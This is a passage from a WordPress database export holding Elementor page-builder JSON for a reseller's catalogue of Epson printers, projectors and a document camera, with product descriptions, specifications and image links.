]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><br>\\n\\nIn creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.\\n<ul>\\n \\t<li>Yield of up to 1,500 4R photos<\\/li>\\n \\t<li>Print speed up to 15ppm<\\/li>\\n \\t<li>High-yield ink bottles<\\/li>\\n \\t<li>1-year warranty or 9,000 prints<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><br><br><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/h4><br>\\nImaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.\\n<ul>\\n \\t<li>High-yield ink bottles<\\/li>\\n \\t<li>2.7 colour LCD screen<\\/li>\\n \\t<li>Direct printing via memory card slot, USB port and PictBridge<\\/li>\\n \\t<li>CD\\/DVD printing<\\/li>\\n \\t<li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br><br><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><br>\\nThe L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.\\n<ul>\\n \\t<li>Yield of Up to 1,800 4R photos<\\/li>\\n \\t<li>Lowest Printing Costs<\\/li>\\n \\t<li>Wi-Fi &amp; Epson iPrint<\\/li>\\n \\t<li>CD\\/DVD Printing Capability<\\/li>\\n \\t<li>1 year or 3,000 prints warranty<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7969,3482,'_elementor_edit_mode','builder'),(7968,3482,'_wp_page_template','template-fullwidth.php'),(7972,3482,'_elementor_version','2.5.14'),(7980,3484,'_wp_page_template','template-fullwidth.php'),(7981,3484,'_elementor_edit_mode','builder'),(7982,3484,'_elementor_template_type','post'),(7983,3484,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 